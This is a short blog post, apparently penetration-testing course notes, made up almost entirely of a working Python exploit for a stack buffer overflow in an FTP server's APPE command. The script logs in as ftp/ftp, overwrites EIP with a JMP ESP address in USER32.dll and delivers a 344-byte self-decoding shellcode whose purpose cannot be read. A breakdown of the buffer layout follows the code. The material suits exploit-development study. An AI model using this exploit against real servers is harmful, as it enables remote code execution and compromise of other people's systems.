Matteo Michelini

Saturday, October 09, 2010

OSCP: shellcode in Win32

---------------------
#!/usr/bin/python

import socket

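# Layout of the overflowing APPE argument, recovered from the crash (the
# notes below the listing walk through it):
#   966 bytes of filler reach the saved return address,
#   4 bytes overwrite EIP,
#   16 bytes of padding sit between the return address and the spot ESP
#   points at when the overwritten address is used,
#   then a NOP sled, the payload, and filler out to the original length.
EIP_OFFSET = 966
# Address of a JMP ESP inside USER32.dll (0x77D8AF0A), written little-endian.
# It is only valid for the target's exact Windows build / service pack and
# relies on USER32.dll loading at a fixed base (no ASLR); re-locate the
# gadget before reusing this script against any other host.
JMP_ESP = b'\x0A\xAF\xD8\x77'
POST_EIP_PAD = b'\x43' * 16
NOP_SLED = b'\x90' * 16
# The original fuzzing buffer was 2000 bytes; the request is padded back out
# to that size so the overflow writes exactly the same amount of data.
TOTAL_LEN = 2000

# 344-byte payload.  The leading bytes look like a self-decoding stub
# (fnstenv-based GetPC followed by an XOR/loop over the rest), so what the
# payload actually does is not readable here -- TODO(review): regenerate it
# yourself or disassemble it before running it; never run opaque shellcode blind.
shellcode = (b"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
             b"\xa3\x87\x03\x83\xeb\xfc\xe2\xf4\xf5\xc9\x6c\x4e\xe1\x5a\x78\xfc"
             b"\xf6\xc3\x0c\x6f\x2d\x87\x0c\x46\x35\x28\xfb\x06\x71\xa2\x68\x88"
             b"\x46\xbb\x0c\x5c\x29\xa2\x6c\x4a\x82\x97\x0c\x02\xe7\x92\x47\x9a"
             b"\xa5\x27\x47\x77\x0e\x62\x4d\x0e\x08\x61\x6c\xf7\x32\xf7\xa3\x2b"
             b"\x7c\x46\x0c\x5c\x2d\xa2\x6c\x65\x82\xaf\xcc\x88\x56\xbf\x86\xe8"
             b"\x0a\x8f\x0c\x8a\x65\x87\x9b\x62\xca\x92\x5c\x67\x82\xe0\xb7\x88"
             b"\x49\xaf\x0c\x73\x15\x0e\x0c\x43\x01\xfd\xef\x8d\x47\xad\x6b\x53"
             b"\xf6\x75\xe1\x50\x6f\xcb\xb4\x31\x61\xd4\xf4\x31\x56\xf7\x78\xd3"
             b"\x61\x68\x6a\xff\x32\xf3\x78\xd5\x56\x2a\x62\x65\x88\x4e\x8f\x01"
             b"\x5c\xc9\x85\xfc\xd9\xcb\x5e\x0a\xfc\x0e\xd0\xfc\xdf\xf0\xd4\x50"
             b"\x5a\xf0\xc4\x50\x4a\xf0\x78\xd3\x6f\xcb\x96\x5f\x6f\xf0\x0e\xe2"
             b"\x9c\xcb\x23\x19\x79\x64\xd0\xfc\xdf\xc9\x97\x52\x5c\x5c\x57\x6b"
             b"\xad\x0e\xa9\xea\x5e\x5c\x51\x50\x5c\x5c\x57\x6b\xec\xea\x01\x4a"
             b"\x5e\x5c\x51\x53\x5d\xf7\xd2\xfc\xd9\x30\xef\xe4\x70\x65\xfe\x54"
             b"\xf6\x75\xd2\xfc\xd9\xc5\xed\x67\x6f\xcb\xe4\x6e\x80\x46\xed\x53"
             b"\x50\x8a\x4b\x8a\xee\xc9\xc3\x8a\xeb\x92\x47\xf0\xa3\x5d\xc5\x2e"
             b"\xf7\xe1\xab\x90\x84\xd9\xbf\xa8\xa2\x08\xef\x71\xf7\x10\x91\xfc"
             b"\x7c\xe7\x78\xd5\x52\xf4\xd5\x52\x58\xf2\xed\x02\x58\xf2\xd2\x52"
             b"\xf6\x73\xef\xae\xd0\xa6\x49\x50\xf6\x75\xed\xfc\xf6\x94\x78\xd3"
             b"\x82\xf4\x7b\x80\xcd\xc7\x78\xd5\x5b\x5c\x57\x6b\xf9\x29\x83\x5c"
             b"\x5a\x5c\x51\xfc\xd9\xa3\x87\x03")


def build_buffer(payload=shellcode, total_len=TOTAL_LEN):
    """Build the APPE argument that overflows the server's stack buffer.

    Args:
        payload: shellcode placed right after the NOP sled (defaults to the
            embedded ``shellcode``).
        total_len: length the request is padded to with 'D' (0x44) bytes.

    Returns:
        bytes: filler + JMP ESP address + 16-byte pad + NOP sled + payload +
        trailing 'D' filler, exactly ``total_len`` bytes long.

    Raises:
        ValueError: if the fixed prefix plus ``payload`` does not fit in
            ``total_len`` bytes.
    """
    head = b'\x41' * EIP_OFFSET + JMP_ESP + POST_EIP_PAD + NOP_SLED + payload
    tail_len = total_len - len(head)
    if tail_len < 0:
        raise ValueError('payload is %d bytes too large for a %d-byte buffer'
                         % (-tail_len, total_len))
    return head + b'\x44' * tail_len


buffer = build_buffer()


def main(host='192.168.11.113', port=21):
    """Log in as ftp/ftp and send the overflowing APPE command.

    The server's replies are read but not checked: this is a one-shot lab
    proof of concept, not a robust FTP client.
    """
    print('Sending evil buffer....')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.recv(1024)                   # banner
        # sendall(): a plain send() may write only part of the buffer, which
        # would silently truncate the overflow.
        s.sendall(b'USER ftp\r\n')
        s.recv(1024)
        s.sendall(b'PASS ftp\r\n')
        s.recv(1024)
        s.sendall(b'APPE ' + buffer + b'\r\n')
    finally:
        s.close()


if __name__ == '__main__':
    main()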
---------------------

buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654   (2000 bytes in total, the same length as the original fuzzing buffer)

'\x41' * 966 of filler to reach the saved return address (the next four bytes land in EIP)
overwrite EIP with the address of a JMP ESP in USER32.dll (0x77D8AF0A, written little-endian); this address is specific to the target's Windows build and assumes USER32.dll loads at a fixed base (no ASLR), so find it again on any other target
'\x43' * 16 of padding, because at the crash ESP points 16 bytes past the overwritten return address
add a 16-byte NOP sled so a slightly different ESP still lands in the sled
put the shellcode (344 bytes), then pad with '\x44' to the original 2000-byte length
